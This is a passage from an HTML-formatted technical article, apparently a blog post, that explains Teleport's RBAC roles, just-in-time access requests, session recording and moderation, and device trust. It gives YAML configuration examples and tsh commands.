&lt;strong&gt;Dynamic Labeling&lt;/strong&gt;: Resources tagged with metadata for RBAC matching&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Real-time Status&lt;/strong&gt;: Live view of resource availability and health&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Search and Filter&lt;/strong&gt;: Find resources by labels, names, or types&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Access Visibility&lt;/strong&gt;: Shows which resources user can access based on roles&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Auto-Discovery Example:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Database service with auto-discovery&lt;/span&gt;
&lt;span class="na"&gt;db_service&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;enabled&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
  &lt;span class="na"&gt;aws&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;types&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;rds"&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;aurora"&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;
    &lt;span class="na"&gt;regions&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;us-west-2"&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;us-east-1"&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;
    &lt;span class="na"&gt;tags&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;env"&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;production"&lt;/span&gt;
      &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;teleport"&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;enabled"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This turns Teleport into not just an access platform but also an infrastructure visibility tool, automatically maintaining an up-to-date inventory without manual configuration.&lt;/p&gt;

&lt;p&gt;↑ Back to top&lt;/p&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Advanced Features
&lt;/h2&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Role-Based Access Control (RBAC)
&lt;/h3&gt;

&lt;p&gt;RBAC in Teleport determines what resources users can access and what actions they can perform. Roles are the central policy mechanism.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Role Structure:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;role&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;backend-developer&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;options&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="c1"&gt;# Certificate TTL - configurable based on security requirements&lt;/span&gt;
    &lt;span class="na"&gt;max_session_ttl&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;8h&lt;/span&gt;

  &lt;span class="na"&gt;allow&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="c1"&gt;# Which resources can be accessed&lt;/span&gt;
    &lt;span class="na"&gt;logins&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;ubuntu'&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;ec2-user'&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;

    &lt;span class="c1"&gt;# Label-based access control&lt;/span&gt;
    &lt;span class="na"&gt;node_labels&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;env'&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;dev'&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;staging'&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;
      &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;team'&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;backend'&lt;/span&gt;

    &lt;span class="c1"&gt;# Database access&lt;/span&gt;
    &lt;span class="na"&gt;db_labels&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;env'&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;dev'&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;staging'&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;
    &lt;span class="na"&gt;db_names&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;analytics'&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;app_db'&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;
    &lt;span class="na"&gt;db_users&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;readonly'&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;app_user'&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;

    &lt;span class="c1"&gt;# Kubernetes access&lt;/span&gt;
    &lt;span class="na"&gt;kubernetes_groups&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;developers'&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;
    &lt;span class="na"&gt;kubernetes_labels&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;env'&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;dev'&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Label-Based Access:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Resources are labeled, and roles specify which labels they can access. This creates dynamic access policies that automatically apply to new resources:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Server labels&lt;/span&gt;
&lt;span class="na"&gt;ssh_service&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;labels&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;env&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;production&lt;/span&gt;
    &lt;span class="na"&gt;team&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;backend&lt;/span&gt;
    &lt;span class="na"&gt;region&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;us-west-2&lt;/span&gt;

&lt;span class="c1"&gt;# Role can access any server matching these labels&lt;/span&gt;
&lt;span class="na"&gt;allow&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;node_labels&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;env'&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;production'&lt;/span&gt;
    &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;team'&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;backend'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Multi-Role Assignment:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Users can have multiple roles, with permissions being additive:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# User has both developer and on-call roles&lt;/span&gt;
&lt;span class="na"&gt;users&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;alice&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;roles&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;developer'&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;on-call-responder'&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;

&lt;span class="c1"&gt;# Combined permissions from both roles apply&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Access Requests: Just-In-Time Privilege Escalation
&lt;/h3&gt;

&lt;p&gt;Access Requests enable users to temporarily request elevated privileges. This implements the principle of least privilege by default with the ability to escalate when needed.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Access Request Workflow:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9dzag0pbzzdw5hv7g3cz.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9dzag0pbzzdw5hv7g3cz.png" alt="image" width="800" height="366"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Approval Workflows:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Role that can request production access&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;role&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;developer&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;allow&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;request&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;roles&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;production-dba'&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;
      &lt;span class="na"&gt;thresholds&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;approve&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;2&lt;/span&gt;  &lt;span class="c1"&gt;# Requires 2 approvals&lt;/span&gt;
        &lt;span class="na"&gt;deny&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;1&lt;/span&gt;
      &lt;span class="na"&gt;annotations&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="na"&gt;wtf&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Reason&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;for&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;access"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Integration with External Systems:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Slack&lt;/strong&gt;: Approvals via Slack buttons&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;PagerDuty&lt;/strong&gt;: Auto-approve during on-call&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Jira/ServiceNow&lt;/strong&gt;: Link to change tickets&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Custom Webhooks&lt;/strong&gt;: Integrate with any system&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Session Recording and Playback
&lt;/h3&gt;

&lt;p&gt;Teleport records all interactive sessions, creating a complete audit trail of infrastructure access.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What Gets Recorded:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;SSH Sessions&lt;/strong&gt;: Complete terminal input/output&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Kubernetes Sessions&lt;/strong&gt;: kubectl commands and API requests&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Database Sessions&lt;/strong&gt;: Connection events and metadata (engine-specific query visibility)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Desktop Sessions&lt;/strong&gt;: Full RDP session video&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Application Access&lt;/strong&gt;: HTTP requests and responses&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Session Recording Modes:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Node-level recording (recorded by agent)&lt;/span&gt;
&lt;span class="na"&gt;record_session&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;desktop&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
  &lt;span class="na"&gt;default&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;node&lt;/span&gt;

&lt;span class="c1"&gt;# Proxy-level recording (recorded by proxy)&lt;/span&gt;
&lt;span class="na"&gt;record_session&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;desktop&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
  &lt;span class="na"&gt;default&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;proxy&lt;/span&gt;

&lt;span class="c1"&gt;# No recording&lt;/span&gt;
&lt;span class="na"&gt;record_session&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;desktop&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;false&lt;/span&gt;
  &lt;span class="na"&gt;default&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;off&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Recording mode trade-offs:&lt;/strong&gt;&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Mode&lt;/th&gt;
&lt;th&gt;Scalability&lt;/th&gt;
&lt;th&gt;Control&lt;/th&gt;
&lt;th&gt;Notes&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;node&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Better — load distributed across agents&lt;/td&gt;
&lt;td&gt;Lower — agent must be healthy&lt;/td&gt;
&lt;td&gt;Preferred for large fleets&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;proxy&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Heavier — Proxy bears recording CPU/bandwidth&lt;/td&gt;
&lt;td&gt;Stronger — recording always captured centrally&lt;/td&gt;
&lt;td&gt;Preferred when agent tampering is a concern&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;off&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Best&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;td&gt;Development environments only&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;Playback Interface:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftopwwux7fe5wypcyr6gg.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftopwwux7fe5wypcyr6gg.png" alt="image" width="800" height="441"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Compliance Benefits:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;PCI DSS&lt;/strong&gt;: Administrator actions on cardholder systems&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;HIPAA&lt;/strong&gt;: Access to systems with PHI&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;SOC 2&lt;/strong&gt;: Evidence of access controls and monitoring&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;FedRAMP&lt;/strong&gt;: Government compliance requirements&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Session Moderation and Shared Access
&lt;/h3&gt;

&lt;p&gt;Teleport enables real-time session collaboration and oversight—critical for training, troubleshooting, and compliance.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Session Joining:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Multiple users can join an active session:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Start a session&lt;/span&gt;
tsh ssh node1

&lt;span class="c"&gt;# Another user joins the session (read-only or interactive)&lt;/span&gt;
tsh &lt;span class="nb"&gt;join &lt;/span&gt;alice@node1
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Moderated Sessions:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Require approval before sensitive sessions begin:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;role&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;production-admin&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;allow&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;require_session_join&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;auditor&lt;/span&gt;
      &lt;span class="na"&gt;kinds&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;k8s'&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;ssh'&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;
      &lt;span class="na"&gt;modes&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;moderator'&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;
      &lt;span class="na"&gt;on_leave&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;terminate&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Session Controls:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Terminate&lt;/strong&gt;: Kill an active session remotely&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Monitor&lt;/strong&gt;: Watch sessions in real-time without participating&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Force Termination&lt;/strong&gt;: Automatically end sessions when moderator leaves&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Use Cases:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Training&lt;/strong&gt;: Senior engineers guide juniors through production tasks&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Compliance&lt;/strong&gt;: Security team oversight of privileged access&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Incident Response&lt;/strong&gt;: Multiple responders collaborate on live issue&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Vendor Access&lt;/strong&gt;: Monitor third-party contractor activities&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Device Trust and Hardware Security
&lt;/h3&gt;

&lt;p&gt;Teleport supports enhanced security through device posture checking and hardware security keys.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Device Trust:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Verify the security posture of devices before granting access:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;role&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;production-access&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;options&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;device_trust_mode&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;required&lt;/span&gt;
  &lt;span class="na"&gt;allow&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="c1"&gt;# Only devices registered and verified can access&lt;/span&gt;
    &lt;span class="na"&gt;node_labels&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;env'&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;production'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Device Registration:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Devices must be enrolled in Teleport&lt;/li&gt;
&lt;li&gt;Device identity verified via TPM or Secure Enclave&lt;/li&gt;
&lt;li&gt;Can integrate with device identity and posture signals depending on platform&lt;/li&gt;
&lt;li&gt;Certificate issued to device, not just user&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Hardware Security Keys (FIDO2/WebAuthn):&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Require hardware security key for authentication&lt;/span&gt;
&lt;span class="na"&gt;authentication&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;local&lt;/span&gt;
  &lt;span class="na"&gt;second_factor&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;webauthn&lt;/span&gt;
  &lt;span class="na"&gt;webauthn&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;rp_id&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;teleport.example.com&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Benefits:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Phishing Resistance&lt;/strong&gt;: FIDO2 keys can't be phished&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Device Binding&lt;/strong&gt;: Access tied to specific physical device&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Zero Trust&lt;/strong&gt;: Device posture continuously verified&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Reduced Risk&lt;/strong&gt;: Even if password leaked, hardware key required&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Trusted Clusters: Multi-Org Federation
&lt;/h3&gt;

&lt;p&gt;Trusted Clusters enable organizations to federate multiple Teleport clusters while maintaining independent security boundaries.&lt;/p&gt;

